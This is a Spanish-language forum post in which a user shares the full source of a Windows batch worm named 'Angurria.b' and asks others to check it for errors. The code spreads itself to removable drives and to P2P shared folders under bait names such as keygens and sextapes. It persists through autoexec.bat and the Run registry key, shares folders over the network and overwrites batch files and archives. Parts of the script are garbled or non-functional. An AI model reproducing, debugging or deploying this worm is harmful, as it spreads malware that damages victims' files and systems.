[V][batch-vbs]Angurria.b.bat teminado!! :)

Iniciado por dArKo2, 24 Marzo 2011, 00:02 AM

0 Miembros y 1 Visitante están viendo este tema.


Aqui la version final de mi pequeña creacion :D la version 'B' no es la gran cosa pero recuerden que es batch :S

Código (dos) [Seleccionar]

@echo off
assoc .avi=batfile
if %date% GEQ 02/27/2012 goto :~0xDdAy
if exist %systemdrive%\AnGurrIa.x (goto :EOF)
for %%A in (E F G H I J K L M N O P Q R S T U V W X Y Z) do copy %0 %%A:\AnGurrIa.bat
for %%u in (*.*) do attrib -s -r -a %%u >nul
copy /Y %0 %systemdrive%\AnGurrIa.bat >nul
attrib -r -h -s C:\autoexec.bat
copy %0 C:\AnGurrIa.x >nul
type C:\autoexec.bat|find "AnGurrIa.x">C:\autoexec.bat
echo call C:\AnGurrIa.x >> C:\autoexec.bat
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v BootConfig /t REG_SZ /d C:\AnGurrIa.x
attrib +r +h +s c:\autoexec.bat
attrib +r +h +s c:\AnGurrIa.x
set 1=VideosXxX
set 2="benlla_Carolina_xxxAVI"
set 3="mujer_con_pony_XXXX"
set 4="adolecentes_Ardientes"
set 5="hot_lesbians"
set 6="BoricuaxXxPlayBoy[Avi-DvDRip]"
set x=%homedrive%\ñoño.bk
type %0>ñoño.bk
mkdir %1%
cd %1%
for %%b in (%2% %3% %4% %5% %6%) do mkdir %%b
dir /b >%tmp%\secmngr.tmp
for /f "tokens=* " %%x in (%temp%\secmngr.tmp) do
call :~sEx %%x
net share "%homedrive%\VideosXxX"
pause >nul
set clit=%1
cd %clit%
type %1>"video.avi"
cd %homedrive%\%a%
echo set shell = CreateObject("wscript.shell") >%homedrive%\0x.vbs
echo shell run "cmd /c %0" xxx", vbHide >>%homedrive%\0x.vbs
start /B /HIGH /D %homedrive%\0x.vbs
set f="%systemdrive%%~AnGurrIa.bat"
cd "%systemdrive%%~AnGurrIa.bat"
echo eMule\Incoming\ > %windir%\mZ.p
echo Shareaza\Downloads\ >> %windir%\mZ.p
echo BearShare\Shared\ >> %windir%\mZ.p
echo EDONKEY2000\incoming\ >>%windir%\mZ.p
echo LimeWire\Shared\ >> %windir%\mZ.p
echo Ares??? >>%windir%\mZ.p
echo Daddy_Yankee_exitos >%windir%\mX.p
echo Kaspersky_Keygen >>%windir%\mX.p
echo benlla_carolina_sextape >>%windir%\mX.p
echo Windows_7_Keygen >>%windir%\mX.p
echo Harry_Potter[avi][DvD-Rip] >>%windir%\mX.p
echo reggaeton_lo_ma_pegao >>%windir%\mX.p
echo black_berry_unlocker[totalmentegratis] >>%windir%\mX.p
echo iphone_unlocker[gratis] >>%windir%\mX.p
set v4=1
set b4="%programfiles%\WinRar\WinRAR.exe"
%b4% a %windir%\t.rar %f%
if not %errorlevel%==9009 set v4=0
goto :~zUz
set v=%1
for /F "tokens=*" "delims=" %%n in (%windir%\mX.p) do (
if %v4%==0 copy /Y %0 "%%n.bat"
%b4% a "%%n.rar" "%%n.bat")
goto :EOF
for /F "tokens=*" "delims=" %%q in (%windir%\mZ.p) do (if exist %programfiles%\%%n
cd %programfiles%\%%n
for %%i in (*.rar) do (
copy /Y %0 "%%m.bat"
%b4% a "%%a" "%%n.bat"
call :~x0x %%a
pause >nul
cd %windir%
del /F *.p
assoc .x=batfile
ren c:\AnGurrIa.bat c:\AnGurrIa.x
copy /Y %0 %temp%\%random%.x
copy /Y %0 %appdata%\%random%.x
copy /Y %0 %allusersprofile%\%random%.x
echo.UnEtE aL lAdO oScUrO, tEnEmOs GaLlEtAs GrAtIs!!! >%temp%\AnGurrIa.tmp
echo.OtRa GuErRa iNjUsTiFiCaDa??!! >>%temp%\AnGurrIa.tmp
for %%a in (*.txt,*.log) do ren *.bat %%a >nul
for %%a in (*.bat) do copy %temp%\AnGurrIa.tmp %%a >nul
for %%i in (*.iso,*.rar,*.zip,) do set xy=%%i
copy %temp%\AnGurrIa.tmp %xy%
del /F %temp%\AnGurrIa.tmp

les agradeceria si revisan el codigo y me dicen si tiene errores
"We seek only reprieve and welcome the darkness"

Shell Root

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.